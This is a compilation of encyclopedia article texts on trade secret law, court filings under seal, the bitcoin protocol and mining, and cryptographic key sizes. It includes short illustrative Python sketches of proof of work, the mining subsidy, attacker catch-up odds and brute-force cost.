be employed by the holder of secrets, an employee may agree to not reveal their prospective employer's proprietary information, to surrender or assign to their employer ownership rights to intellectual work and work-products produced during the course (or as a condition) of employment, and to not work for a competitor for a given period of time (sometimes within a given geographic region). Violating the agreement generally carries the possibility of heavy financial penalties, thus disincentivizing the revealing of trade secrets. Trade secret information can be protected through legal action including an injunction preventingbreaches of confidentiality, monetary damages, and, in some instances, punitive damages and attorneys’ fees. In extraordinary circumstances, anex parte seizureunder theDefend Trade Secrets Act(DTSA) also allows the court to seize property to prevent the propagation or dissemination of the trade secret.[31] However, proving a breach of an NDA by a former stakeholder who is legally working for a competitor or prevailing in a lawsuit for breaching a non-compete clause can be very difficult.[32]A holder of a trade secret may also require similar agreements from other parties, such as vendors, licensees, and board members. 
As a company can protect its confidential information through NDA, work-for-hire, and non-compete contracts with its stakeholders (within the constraints of employment law, including only restraint that is reasonable in geographic- and time-scope), these protective contractual measures effectively create a monopoly on secret information that does not expire as would apatentorcopyright. The lack of formal protection associated with registered intellectual property rights, however, means that a third party not bound by a signed agreement is not prevented from independently duplicating and using the secret information once it is discovered, such as throughreverse engineering. Therefore, trade secrets such as secret formulae are often protected by restricting the key information to a few trusted individuals. Famous examples of products protected by trade secrets areChartreuse liqueurandCoca-Cola.[33] Because protection of trade secrets can, in principle, extend indefinitely, it may provide an advantage over patent protection and other registered intellectual property rights, which last for a limited duration. For example, the Coca-Cola company has no patent for theformula of Coca-Colaand has been effective in protecting it for many more years than the 20 years of protection that a patent would have provided. In fact, Coca-Cola refused to reveal its trade secret under at least two judges' orders.[34] Trade secret legal protection can reduce knowledge spillover, which otherwise enhances the spread of knowledge and technological improvement.[35]Therefore, while trade secret laws strengthen R&D exclusivity and encourage firms to engage in innovative activities, broadly reducingknowledge spilloverscan harm economic growth. In general, trade secret misappropriation occurs when someone improperly acquires, discloses, or uses a trade secret without the trade secret holder's consent.[36][37][38]Common scenarios include former employees taking proprietary data to a new employer in violation ofnon-disclosure agreements(NDAs), espionage, or unauthorized disclosure.[39][36][40] To prove misappropriation, the trade secret holder must generally show—subject to the specific requirements of the applicable jurisdiction—that: (1) the information qualifies as a trade secret, (2) reasonable measures were taken to keep it secret, and (3) the defendant acquired, used, or disclosed it through improper means. While the improper, dishonest, or unlawful acquisition, use, or disclosure of trade secret information by unauthorized third parties is generally prohibited, there are exceptions to this rule. The scope of these exceptions and limitations varies across jurisdictions, but they commonly cover independent discovery andreverse engineering, and, in some jurisdictions, whistleblower disclosures. InCommonwealthcommon lawjurisdictions, confidentiality and trade secrets are regarded as anequitableright rather than apropertyright.[44] TheCourt of Appeal of England and Walesin the case ofSaltman Engineering Co Ltd v. Campbell Engineering Ltd[45]held that the action for breach of confidence is based on a principle of preserving "good faith". The test for a cause of action for breach of confidence in thecommon lawworld is set out in the case ofCoco v. A.N. Clark (Engineers) Ltd:[46]the information itself must have the necessary quality of confidence about it; it must have been imparted in circumstances importing an obligation of confidence; and there must be an unauthorized use of that information to the detriment of the party communicating it. The "quality of confidence" highlights that trade secrets are a legal concept. With sufficient effort or through illegal acts (such as breaking and entering), competitors can usually obtain trade secrets. However, so long as the owner of the trade secret can prove that reasonable efforts have been made to keep the information confidential, the information remains a trade secret and generally remains legally protected. 
Conversely, trade secret owners who cannot evidence reasonable efforts at protecting confidential information risk losing the trade secret, even if the information is obtained by competitors illegally. It is for this reason that trade secret owners shred documents and do not simply recycle them.[citation needed] A successful plaintiff is entitled to various forms ofjudicial relief, including injunctions against further use or disclosure, monetary damages, and, in some cases, punitive damages and attorneys' fees. Hong Kongdoes not follow the traditional commonwealth approach, instead recognizing trade secrets where a judgment of the High Court indicates that confidential information may be a property right.[47] The EU adopted aDirective on the Protection of Trade Secretson 27 May 2016.[48]The goal of the directive is to harmonize the definition of trade secrets in accordance with existing international standards, and the means of obtaining protection of trade secrets within the EU.[48] Unlike in the US, trade secrets in the EU are not strictly treated as an IP right, as the protection gives the holder no exclusive rights. It is more a protection against the unfair use or publication of the secret information.[48] Within the U.S., trade secrets generally encompass a company's proprietary information that is not generally known to its competitors, and which provides the company with a competitive advantage.[49] Although trade secret law evolved under state common law, prior to 1974 the question of whether patent law preempted state trade secret law had been unanswered. In 1974, theUnited States Supreme Courtissued the landmark decisionKewanee Oil Co. v. Bicron Corp., which resolved the question in favor of allowing the states to freely develop their own trade secret laws.[50] In 1979, several U.S. states adopted theUniform Trade Secrets Act(UTSA), which was further amended in 1985, with approximately 47 states having adopted some variation of it as the basis for trade secret law. Another significant development is theEconomic Espionage Act (EEA) of 1996(18 U.S.C.§§ 1831–1839), which makes the theft or misappropriation of a trade secret a federal crime. This law contains two provisions criminalizing two sorts of activity: economic espionage for the benefit of a foreign government or its agents (18 U.S.C. § 1831), and the theft of trade secrets for commercial or economic benefit (18 U.S.C. § 1832). The statutory penalties are different for the two offenses. The EEA was extended in 2016 to allow companies to file civil suits in federal court.[51] On May 11, 2016, President Obama signed theDefend Trade Secrets Act(DTSA), 18 U.S.C. 
§§ 1839 et seq., which for the first time created a federal cause of action for misappropriating trade secrets.[52]The DTSA provides for both a private right of action for damages and injunction and a civil action for injunction brought by the Attorney General.[53] The statute followed state laws on liability in significant part, defining trade secrets in the same way as the Uniform Trade Secrets Act as "all forms and types of financial, business, scientific, technical, economic, or engineering information, including patterns, plans, compilations, program devices, formulas, designs, prototypes, methods, techniques, processes, procedures, programs, or codes, whether tangible or intangible, and whether or how stored, compiled, or memorialized physically, electronically, graphically, photographically, or in writing if (A) the owner thereof has taken reasonable measures to keep such information secret; and (B) the information derives independent economic value, actual or potential, from not being generally known to, and not being readily ascertainable through proper means by, another person who can obtain economic value from the disclosure or use of the information." However, the law contains several important differences from prior law: it opens the federal courts to trade secret plaintiffs, adds the ex parte seizure remedy noted above, and grants immunity to whistleblowers who disclose a trade secret in confidence to government officials or an attorney for the purpose of reporting a suspected violation of law. The DTSA also clarifies that a United States resident (including a company) can be liable for misappropriation that takes place outside the United States, and any person can be liable as long as an act in furtherance of the misappropriation takes place in the United States, 18 U.S.C. §1837. The DTSA provides the courts with broad injunctive powers. 18 U.S.C. §1836(b)(3). The DTSA does not preempt or supplant state laws, but provides an additional cause of action. Because states vary significantly in their approach to the "inevitable disclosure" doctrine,[54]its use has limited, if any, application under the DTSA, 18 U.S.C.§1836(b)(3)(A).[55] In the United States, trade secrets are not protected by law in the same way aspatentsortrademarks. While the US Constitution explicitlyauthorizesthe existence of and the federal jurisdiction overpatentsandcopyrights, it is silent on trade secrets,trademarks, etc. For this reason, Federal Law for the latter types of intellectual property is based on theCommerce Clause(rather than theCopyright Clause) under the theory that these IP types are used ininterstate commerce. On the other hand, the application of the Interstate Commerce Theory did not find much judicial support in regulating trade secrets: since a trade secret process is used in a state where it is protected by state law, federal protection may be needed only whenindustrial espionageby a foreign entity is involved (given that the States themselves cannot regulate commerce with foreign powers). Due to these Constitutional requirements, patents and trademarks enjoy strong federal protection in the USA (thePatent ActandLanham Act, respectively), while trade secrets usually have to rely on more limitedstate laws. Most states have adopted theUniform Trade Secrets Act(UTSA), except forMassachusetts,New York, andNorth Carolina. However, since 2016 with the enactment of theDefend Trade Secrets Act(DTSA), some additional trade secret protection has also become available under federal law. One of the differences between patents and trademarks, on the one hand, and trade secrets, on the other, is that a trade secret is protected only when the owner has taken reasonable measures to protect the information as a secret (see18 U.S.C.§ 1839(3)(A)). 
Nations have different trademark policies. Assuming the mark in question meets certain other standards of protectibility, trademarks are generally protected from infringement on the grounds that other uses might confuse consumers as to the origin or nature of the goods once the mark has been associated with a particular supplier. Similar considerations apply toservice marksandtrade dress. By definition, a trademark enjoys no protection (quatrademark) until and unless it is "disclosed" to consumers, for only then are consumers able to associate it with a supplier or source in the requisite manner. (That a company plans tousea certain trademark might itself be protectable as a trade secret, however, until the mark is actually made public.)[56]To acquiretrademarkrights under U.S. law, one must simply use the mark "in commerce".[57]It is possible to register a trademark in the United States, both at the federal and state levels. Registration of trademarks confers some advantages, including stronger protection in certain respects, but registration is not required in order to get protection.[57]Registration may be required in order to file a lawsuit for trademark infringement. To acquire a patent,enablinginformation about the method or product has to be supplied to a patent office and upon publication (usually years before issuance of a patent), it becomes available to all. After expiration of the patent, competitors can copy the method or product legally. The most important advantage of patents (compared to trade secrets) is that patents assure the monopoly of their owners, even when the patented subject matter is independently invented by others later (there aresome exceptions), as well as when the patented subject matter was invented by others prior to the patent'spriority date, kept as a trade secret, and used by the other in its business. Although it is legally possible to "convert" a trade secret into a patent, the claims in such a patent would be limited to features that are not easily discernible from examining the product itself. This means thatcompositions of matterandarticles of manufacturecannot be patented after they become available to the public, whileprocessescan. The temporarymonopolyon the patented invention is regarded as apay-offfor disclosing the information to the public.[citation needed]In order to obtain a patent, the inventor mustdisclose the invention, so that others will be able to both make and use the invention. Often, an invention will be improved after filing of the patent application, and additional information will be learned. None of that additional information need be disclosed through the patent application process, and it may thus be kept as a trade secret.[58]That nondisclosed information will often increase the commercial viability of the patent. Most patent licenses include clauses that require the inventor to disclose any trade secrets they have, and patent licensors must be careful to maintain their trade secrets while licensing a patent through such means as the use of anon-disclosure agreement. 
Compared to patents, the advantages of trade secrets are that a trade secret is not time limited (it "continues indefinitely as long as the secret is not revealed to the public", whereas a patent is only in force for a specified time, after which others may freely copy the invention), a trade secret does not imply any registration costs,[59]has an immediate effect, does not require compliance with any formalities, and does not imply any disclosure of the invention to the public.[59]The disadvantages of trade secrets include that "others may be able to legally discover the secret and be thereafter entitled to use it", "others may obtain patent protection for legally discovered secrets", and a trade secret is more difficult to enforce than a patent.[60] TheFreedom of Information Actof 1966 (FOIA), which requires federal agencies to provide documents to the public on request, includes a discretionary exemption for trade secrets.[61]Thus, trade secret regulations can mask the composition of chemical agents inconsumer products, which has long been criticized for allowing the trade secret holders to hide the presence of potentially harmful andtoxic substances. It has been argued that the public is being denied a clear picture of such products' safety, whereas competitors are well positioned to analyze its chemical composition.[62]In 2004, the National Environmental Trust tested 40 common consumer products; in more than half of them they found toxic substances not listed on theproduct label.[62]
https://en.wikipedia.org/wiki/Trade_secret
Filing under sealis a procedure allowing sensitive or confidential information to be filed with a court without becoming a matter ofpublic record.[1]The court generally must give permission for the material to remain under seal.[2] Filing confidential documents "under seal", separated from the public record, allowslitigantsto navigate the judicial system without compromising their confidentiality, at least until there is an affirmative decision by consent of the information's owner or by order of the court to publicize it.[2] When a document is filed under seal, it should have a clear indication for thecourt clerkto file it separately – most often by stamping the words "Filed Under Seal" at the bottom of each page. The person making the filing should also provide instructions to the court clerk that the document needs to be filed "under seal". Courts often have specific requirements for these filings in their Local Rules.[3] Normally records should not be filed under seal without court permission.[3]However,Federal Rule of Civil Procedure5.2 allows a person making a redacted filing to also file an unredacted copy under seal.[4]
https://en.wikipedia.org/wiki/Under_seal
Thebitcoin protocolis theset of rulesthat govern the functioning ofbitcoin. Its key components and principles are: apeer-to-peerdecentralized network with no central oversight; theblockchaintechnology, a publicledgerthat records all bitcoin transactions;miningandproof of work, the process to create new bitcoins and verify transactions; and cryptographic security. Users broadcastcryptographically signedmessages to the network using bitcoincryptocurrency walletsoftware. These messages are proposed transactions, changes to be made in the ledger. Each node has a copy of the ledger's entire transaction history. If a transaction violates the rules of the bitcoin protocol, it is ignored, as transactions only occur when the entire network reaches a consensus that they should take place. This "full network consensus" is achieved when each node on the network verifies the results of aproof-of-workoperation calledmining. Mining packages groups of transactions into blocks, and produces ahash codethat follows the rules of the bitcoin protocol. Creating this hash requires expending significantenergy, but a network node can verify the hash is valid using very little energy. If a miner proposes a block to the network, and its hash is valid, the block and its ledger changes are added to the blockchain, and the network moves on to yet-unprocessed transactions. If there is a dispute, the longest chain is considered correct. A new block is created every 10 minutes, on average. Changes to the bitcoin protocol require consensus among the network participants. The bitcoin protocol has inspired the creation of numerous other digital currencies and blockchain-based technologies, making it a foundational technology in the field ofcryptocurrencies. Blockchaintechnology is a decentralized and secure digital ledger that records transactions across a network of computers. It ensures transparency, immutability, and tamper resistance, making data manipulation difficult. Blockchain is the underlying technology for cryptocurrencies like bitcoin and has applications beyond finance, such as supply chain management and smart contracts.[1] The network requires minimal structure to share transactions. Anad hocdecentralized network of volunteers is sufficient. Messages are broadcast on abest-effortbasis, and nodes can leave and rejoin the network at will. Upon reconnection, a node downloads and verifies new blocks from other nodes to complete its local copy of the blockchain.[2][3] Bitcoin uses a proof-of-work system to form a distributed timestamp server as apeer-to-peer network.[3]This work is often calledbitcoin mining. During mining, practically all of the computing power of the bitcoin network is used to solve cryptographic tasks; this constitutes the proof of work. Its purpose is to ensure that the generation of valid blocks involves a certain amount of effort so that subsequent modification of the blockchain, such as in the 51% attack scenario, can be practically ruled out. Because of the difficulty, miners form "mining pools" to obtain steadier payouts despite the high power requirements and costly hardware deployments. As a result of the Chinese ban on bitcoin mining in 2021, the United States currently holds the largest share of bitcoin mining pools.[4][5] Requiring a proof of work to accept a new block to the blockchain wasSatoshi Nakamoto's key innovation. 
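A minimal Python sketch may make this proof-of-work idea concrete. The header string and the 16-bit difficulty below are illustrative assumptions only; real block headers and targets are far more demanding (the double-SHA-256 and nonce mechanics the sketch relies on are described in the next paragraph):

    # Toy proof of work: find a nonce whose double-SHA-256 hash of the block
    # header falls below a target (here: 16 leading zero bits, for speed).
    import hashlib

    def double_sha256(data: bytes) -> bytes:
        return hashlib.sha256(hashlib.sha256(data).digest()).digest()

    header = b"prev_hash|merkle_root|timestamp|"   # placeholder header fields
    target = 1 << (256 - 16)                       # real targets are far smaller

    nonce = 0
    while int.from_bytes(double_sha256(header + nonce.to_bytes(8, "little")), "big") >= target:
        nonce += 1

    # Finding the nonce took many hashes; verifying it takes just one.
    proof = double_sha256(header + nonce.to_bytes(8, "little"))
    assert int.from_bytes(proof, "big") < target
    print(f"nonce={nonce}, hash={proof.hex()}")

Note the asymmetry the sketch demonstrates: the search loop performs tens of thousands of hashes on average, while the final check recomputes only one.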
The mining process involves identifying a block that, when hashed twice withSHA-256, yields a number smaller than the given difficulty target. While the average work required increases in inverse proportion to the difficulty target, a hash can always be verified by executing a single round of double SHA-256. For the bitcoin timestamp network, a valid proof of work is found by incrementing anonceuntil a value is found that gives the block's hash the required number of leading zero bits. Once thehashinghas produced a valid result, the block cannot be changed without redoing the work. As later blocks are chained after it, the work to change the block would include redoing the work for each subsequent block. If there is a deviation in consensus, then ablockchain forkcan occur. Majority consensus in bitcoin is represented by the longest chain, which required the greatest amount of effort to produce. If a majority of computing power is controlled by honest nodes, the honest chain will grow fastest and outpace any competing chains. To modify a past block, an attacker would have to redo the proof-of-work of that block and all blocks after it and then surpass the work of the honest nodes. The probability of a slower attacker catching up diminishes exponentially as subsequent blocks are added.[3] To compensate for increasing hardware speed and varying interest in running nodes over time, the difficulty of finding a valid hash is adjusted roughly every two weeks. If blocks are generated too quickly, the difficulty increases and more hashes are required to make a block and to generate new bitcoins.[3] Bitcoin mining is a competitive endeavor. An "arms race" has been observed through the various hashing technologies that have been used to mine bitcoins: basiccentral processing units(CPUs), high-endgraphics processing units(GPUs),field-programmable gate arrays(FPGAs) andapplication-specific integrated circuits(ASICs) all have been used, each reducing the profitability of the less-specialized technology. Bitcoin-specific ASICs are now the primary method of mining bitcoin and have surpassed GPU speed by as much as 300-fold. The difficulty of the mining process is periodically adjusted to the mining power active on the network. As bitcoins have become more difficult to mine, computer hardware manufacturing companies have seen an increase in sales of high-end ASIC products.[8] Computing power is often bundled together or "pooled" to reduce variance in miner income. Individual mining rigs often have to wait for long periods to confirm a block of transactions and receive payment. In a pool, all participating miners get paid every time a participating server solves a block. This payment depends on the amount of work an individual miner contributed to help find that block, and the payment system used by the pool.[9] By convention, the first transaction in a block is a special transaction that produces new bitcoins owned by the creator of the block. This is the incentive for nodes to support the network.[2]It provides a way to move new bitcoins into circulation. The reward for mining halves every 210,000 blocks. It started at 50 bitcoin, dropped to 25 in late 2012, to 12.5 in 2016, and to 6.25 in 2020. 
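This subsidy schedule reduces to a few lines of code. The sketch below is illustrative; amounts are in BTC, and floats are used only for readability (the reference client computes the subsidy in integer satoshis with a right-shift):

    # Block subsidy as a function of height: 50 BTC, halved every 210,000 blocks.
    def block_subsidy(height: int, interval: int = 210_000) -> float:
        halvings = height // interval
        if halvings >= 64:          # after 64 halvings, new coin creation ceases
            return 0.0
        return 50.0 / (2 ** halvings)

    assert block_subsidy(0) == 50.0            # genesis era
    assert block_subsidy(210_000) == 25.0      # late 2012
    assert block_subsidy(630_000) == 6.25      # 2020
    assert block_subsidy(840_000) == 3.125     # April 2024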
The most recent halving, which occurred on 20 April 2024 at 12:09am UTC (with block number 840,000), reduced the block reward to 3.125 bitcoins.[15][16]The next halving is expected to occur in 2028, when the block reward will fall to 1.5625 bitcoins.[17][18]This halving process is programmed to continue a maximum of 64 times before new coin creation ceases.[19] Each miner can choose which transactions are included in or exempted from a block.[20]A greater number of transactions in a block does not equate to greater computational power required to solve that block.[20] As noted in Nakamoto's whitepaper, it is possible to verify bitcoin payments without running a full network node (simplified payment verification, SPV). A user only needs a copy of the block headers of the longest chain, which are available by querying network nodes until it is apparent that the longest chain has been obtained, and then to obtain theMerkle treebranch linking the transaction to its block. Linking the transaction to a place in the chain demonstrates that a network node has accepted it, and blocks added after it further establish the confirmation.[2] Various potential attacks on the bitcoin network and its use as a payment system, real or theoretical, have been considered. The bitcoin protocol includes several features that protect it against some of those attacks, such as unauthorized spending, double spending, forging bitcoins, and tampering with the blockchain. Other attacks, such as theft of private keys, require due care by users.[21][22] Unauthorized spending is mitigated by bitcoin's implementation of public-private key cryptography. For example, when Alice sends a bitcoin to Bob, Bob becomes the new owner of the bitcoin. Eve, observing the transaction, might want to spend the bitcoin Bob just received, but she cannot sign the transaction without the knowledge of Bob's private key.[22] A specific problem that an internet payment system must solve isdouble-spending, whereby a user pays the same coin to two or more different recipients. An example of such a problem would be if Eve sent a bitcoin to Alice and later sent the same bitcoin to Bob. The bitcoin network guards against double-spending by recording all bitcoin transfers in a ledger (the blockchain) that is visible to all users, and ensuring for all transferred bitcoins that they have not been previously spent.[22]: 4 If Eve offers to pay Alice a bitcoin in exchange for goods and signs a corresponding transaction, it is still possible that she also creates a different transaction at the same time sending the same bitcoin to Bob. By the rules, the network accepts only one of the transactions. This is called arace attack, since there is a race between the recipients to accept the transaction first. Alice can reduce the risk of a race attack by stipulating that she will not deliver the goods until Eve's payment to Alice appears in the blockchain.[23] A variant race attack (which has been called a Finney attack by reference to Hal Finney) requires the participation of a miner. Instead of sending both payment requests (to pay Bob and Alice with the same coins) to the network, Eve issues only Alice's payment request to the network, while the accomplice tries to mine a block that includes the payment to Bob instead of Alice. There is a positive probability that the rogue miner will succeed before the network, in which case the payment to Alice will be rejected. 
As with the plain race attack, Alice can reduce the risk of a Finney attack by waiting for the payment to be included in the blockchain.[24] Each block that is added to the blockchain, starting with the block containing a given transaction, is called a confirmation of that transaction. Ideally, merchants and services that receive payment in bitcoin should wait for at least a few confirmations to be distributed over the network before assuming that the payment was completed. The more confirmations that the merchant waits for, the more difficult it is for an attacker to successfully reverse the transaction—unless the attacker controls more than half the total network power, in which case it is called a 51% attack, or a majority attack.[25]Although such attacks are more difficult for attackers with a smaller share of mining power, there may be financial incentives that make history-modification attacks profitable.[26] TheBitcoin scalability problemrefers to the limited capability of theBitcoinnetwork to handle large amounts of transaction data on its platform in a short span of time.[27]It is related to the fact that records (known asblocks) in the Bitcoinblockchainare limited in size and frequency.[28] Deanonymisationis a strategy in data mining in which anonymous data is cross-referenced with other sources of data to re-identify the anonymous data source. Along with transaction graph analysis, which may reveal connections between bitcoin addresses (pseudonyms),[21][30]there is a possible attack[31]which links a user's pseudonym to itsIP address. If the peer is usingTor, the attack includes a method to separate the peer from the Tor network, forcing them to use their real IP address for any further transactions. The cost of the attack on the full bitcoin network was estimated to be under €1500 per month, as of 2014.[31]
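The value of waiting for confirmations, discussed above, can be quantified. The sketch below follows the attacker catch-up calculation in section 11 of Nakamoto's white paper, where q is the attacker's share of total hashing power and z the number of confirmations the merchant waits for:

    # Probability that an attacker with hash-power share q ever overtakes the
    # honest chain from z blocks behind (Nakamoto white paper, section 11).
    import math

    def attacker_success(q: float, z: int) -> float:
        p = 1.0 - q
        if q >= p:
            return 1.0              # a majority (51%) attacker always succeeds
        lam = z * q / p
        total = 1.0
        for k in range(z + 1):
            poisson = math.exp(-lam) * lam ** k / math.factorial(k)
            total -= poisson * (1.0 - (q / p) ** (z - k))
        return total

    # With 10% of the network's power, six confirmations leave the attacker
    # a success probability on the order of 0.0002.
    print(f"{attacker_success(0.1, 6):.6f}")

The exponential decay this computes is the reason the common advice of waiting for several confirmations is effective against minority attackers while being useless against a true majority attacker.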
https://en.wikipedia.org/wiki/Bitcoin_mining
Incryptography,key sizeorkey lengthrefers to the number ofbitsin akeyused by acryptographicalgorithm (such as acipher). Key length defines the upper-bound on an algorithm'ssecurity(i.e. a logarithmic measure of the fastest known attack against an algorithm), because the security of all algorithms can be violated bybrute-force attacks. Ideally, the lower-bound on an algorithm's security is by design equal to the key length (that is, the algorithm's design does not detract from the degree of security inherent in the key length). Mostsymmetric-key algorithmsare designed to have security equal to their key length. However, after design, a new attack might be discovered. For instance,Triple DESwas designed to have a 168-bit key, but an attack of complexity 2^112 is now known (i.e. Triple DES now only has 112 bits of security, and of the 168 bits in the key the attack has rendered 56 'ineffective' towards security). Nevertheless, as long as the security (understood as "the amount of effort it would take to gain access") is sufficient for a particular application, then it does not matter if key length and security coincide. This is important forasymmetric-key algorithms, because no such algorithm is known to satisfy this property;elliptic curve cryptographycomes the closest with an effective security of roughly half its key length. Keysare used to control the operation of a cipher so that only the correct key can convert encrypted text (ciphertext) toplaintext. All commonly-used ciphers are based on publicly knownalgorithmsor areopen sourceand so it is only the difficulty of obtaining the key that determines security of the system, provided that there is no analytic attack (i.e. a "structural weakness" in the algorithms or protocols used), and assuming that the key is not otherwise available (such as via theft, extortion, or compromise of computer systems). The widely accepted notion that the security of the system should depend on the key alone has been explicitly formulated byAuguste Kerckhoffs(in the 1880s) andClaude Shannon(in the 1940s); the statements are known asKerckhoffs' principleand Shannon's Maxim respectively. A key should, therefore, be large enough that a brute-force attack (possible against any encryption algorithm) is infeasible – i.e. would take too long and/or would take too much memory to execute.Shannon'swork oninformation theoryshowed that to achieve so-called 'perfect secrecy', the key length must be at least as large as the message and only used once (this algorithm is called theone-time pad). In light of this, and the practical difficulty of managing such long keys, modern cryptographic practice has discarded the notion of perfect secrecy as a requirement for encryption, and instead focuses oncomputational security, under which the computational requirements of breaking an encrypted text must be infeasible for an attacker. Encryption systems are often grouped into families. Common families include symmetric systems (e.g.AES) and asymmetric systems (e.g.RSAandElliptic-curve cryptography[ECC]). They may be grouped according to the centralalgorithmused (e.g.ECCandFeistel ciphers). Because each of these has a different level of cryptographic complexity, it is usual to have different key sizes for the samelevel of security, depending upon the algorithm used. 
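The one-time pad mentioned above is simple enough to demonstrate directly. The following minimal Python sketch shows the construction; it is only perfectly secret under Shannon's stated conditions (a truly random key, at least as long as the message, never reused):

    # One-time pad: XOR with a random, single-use key as long as the message.
    import secrets

    message = b"ATTACK AT DAWN"
    key = secrets.token_bytes(len(message))   # must be random and used only once

    ciphertext = bytes(m ^ k for m, k in zip(message, key))
    recovered = bytes(c ^ k for c, k in zip(ciphertext, key))
    assert recovered == message

Because every possible plaintext of the same length corresponds to some equally likely key, the ciphertext alone reveals nothing about the message, which is exactly why the key-management burden noted above is unavoidable.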
As an example of this equivalence, the security available with a 1024-bit key using asymmetricRSAis considered approximately equal in security to an 80-bit key in a symmetric algorithm.[1] The actual degree of security achieved over time varies, as more computational power and more powerful mathematical analytic methods become available. For this reason, cryptologists tend to look at indicators that an algorithm or key length shows signs of potential vulnerability, to move to longer key sizes or more difficult algorithms. For example, as of May 2007[update], a 1039-bit integer was factored with thespecial number field sieveusing 400 computers over 11 months.[2]The factored number was of a special form; the special number field sieve cannot be used on RSA keys. The computation is roughly equivalent to breaking a 700-bit RSA key. However, this might be an advance warning that 1024-bit RSA keys used in secure online commerce should bedeprecated, since they may become breakable in the foreseeable future. Cryptography professorArjen Lenstraobserved that "Last time, it took nine years for us to generalize from a special to a nonspecial, hard-to-factor number" and when asked whether 1024-bit RSA keys are dead, said: "The answer to that question is an unqualified yes."[3] The 2015Logjam attackrevealed additional dangers in using Diffie-Hellman key exchange when only one or a few common 1024-bit or smaller prime moduli are in use. This practice, somewhat common at the time, allows large amounts of communications to be compromised at the expense of attacking a small number of primes.[4][5] Even if a symmetric cipher is currently unbreakable by exploiting structural weaknesses in its algorithm, it may be possible to run through the entirespaceof keys in what is known as a brute-force attack. Because longer symmetric keys require exponentially more work to brute-force search, a sufficiently long symmetric key makes this line of attack impractical. With a key of length n bits, there are 2^n possible keys. This number grows very rapidly as n increases. The large number of operations (2^128) required to try all possible 128-bit keys is widely consideredout of reachfor conventional digital computing techniques for the foreseeable future.[6]However, aquantum computercapable of runningGrover's algorithmwould be able to search the possible keys more efficiently: a suitably sized quantum computer would reduce a 128-bit key to 64-bit security, roughly aDESequivalent. This is one of the reasons whyAESsupports key lengths of 256 bits and longer.[a] IBM'sLucifer cipherwas selected in 1974 as the base for what would become theData Encryption Standard. Lucifer's key length was reduced from 128 bits to56 bits, which theNSAand NIST argued was sufficient for non-governmental protection at the time. The NSA has major computing resources and a large budget; some cryptographers includingWhitfield DiffieandMartin Hellmancomplained that this made the cipher so weak that NSA computers would be able to break a DES key in a day through brute forceparallel computing. 
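The brute-force arithmetic behind such assessments is straightforward to reproduce. The sketch below assumes a purely hypothetical rate of 10^12 guesses per second, and applies the Grover square-root speedup mentioned above (real quantum "guesses" would be far slower and harder to parallelize, so this overstates the quantum threat):

    # Rough time to exhaust a 2^n keyspace at a hypothetical guess rate.
    SECONDS_PER_YEAR = 31_557_600   # Julian year

    def brute_force_years(bits: int, guesses_per_second: float = 1e12) -> float:
        return 2 ** bits / guesses_per_second / SECONDS_PER_YEAR

    for n in (56, 80, 128, 256):
        classical = brute_force_years(n)
        grover = brute_force_years(n // 2)   # Grover: ~2^(n/2) evaluations
        print(f"{n:3d}-bit key: ~{classical:.2e} years classical, "
              f"~{grover:.2e} years under Grover's algorithm")

At this optimistic rate a 56-bit DES key falls in under a day, while exhausting a 128-bit keyspace classically still takes on the order of 10^19 years, illustrating why 128 bits is considered out of reach for conventional computing.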
The NSA disputed this, claiming that brute-forcing DES would take them "something like 91 years".[7] However, by the late 1990s, it became clear that DES could be cracked in a few days' time-frame with custom-built hardware such as could be purchased by a large corporation or government.[8][9] The book Cracking DES (O'Reilly and Associates) tells of the successful attempt in 1998 to break 56-bit DES by a brute-force attack mounted by a cyber civil rights group with limited resources; see EFF DES cracker. Even before that demonstration, 56 bits was considered insufficient length for symmetric algorithm keys for general use. Because of this, DES was replaced in most security applications by Triple DES, which has 112 bits of security when using 168-bit keys (triple key).[1] The Advanced Encryption Standard published in 2001 uses key sizes of 128, 192 or 256 bits. Many observers consider 128 bits sufficient for the foreseeable future for symmetric algorithms of AES's quality until quantum computers become available. However, as of 2015, the U.S. National Security Agency has issued guidance that it plans to switch to quantum computing resistant algorithms and now requires 256-bit AES keys for data classified up to Top Secret.[10] In 2003, the U.S. National Institute of Standards and Technology (NIST) proposed phasing out 80-bit keys by 2015. In 2005, 80-bit keys were allowed only until 2010.[11] Since 2015, NIST guidance says that "the use of keys that provide less than 112 bits of security strength for key agreement is now disallowed." NIST-approved symmetric encryption algorithms include three-key Triple DES and AES. Approvals for two-key Triple DES and Skipjack were withdrawn in 2015; the NSA's Skipjack algorithm used in its Fortezza program employs 80-bit keys.[1] The effectiveness of public key cryptosystems depends on the intractability (computational and theoretical) of certain mathematical problems such as integer factorization. These problems are time-consuming to solve, but usually faster than trying all possible keys by brute force. Thus, asymmetric keys must be longer for equivalent resistance to attack than symmetric algorithm keys. The most common methods are assumed to be weak against sufficiently powerful quantum computers in the future. Since 2015, NIST recommends a minimum of 2048-bit keys for RSA,[12] an update to the widely accepted recommendation of a 1024-bit minimum since at least 2002.[13] 1024-bit RSA keys are equivalent in strength to 80-bit symmetric keys, 2048-bit RSA keys to 112-bit symmetric keys, 3072-bit RSA keys to 128-bit symmetric keys, and 15360-bit RSA keys to 256-bit symmetric keys.[14] In 2003, RSA Security claimed that 1024-bit keys were likely to become crackable sometime between 2006 and 2010, while 2048-bit keys are sufficient until 2030.[15] As of 2020 the largest RSA key publicly known to be cracked is RSA-250 with 829 bits.[16] The Finite Field Diffie-Hellman algorithm has roughly the same key strength as RSA for the same key sizes. The work factor for breaking Diffie-Hellman is based on the discrete logarithm problem, which is related to the integer factorization problem on which RSA's strength is based. Thus, a 2048-bit Diffie-Hellman key has about the same strength as a 2048-bit RSA key. Elliptic-curve cryptography (ECC) is an alternative set of asymmetric algorithms that is equivalently secure with shorter keys, requiring only approximately twice as many bits as the equivalent symmetric algorithm.
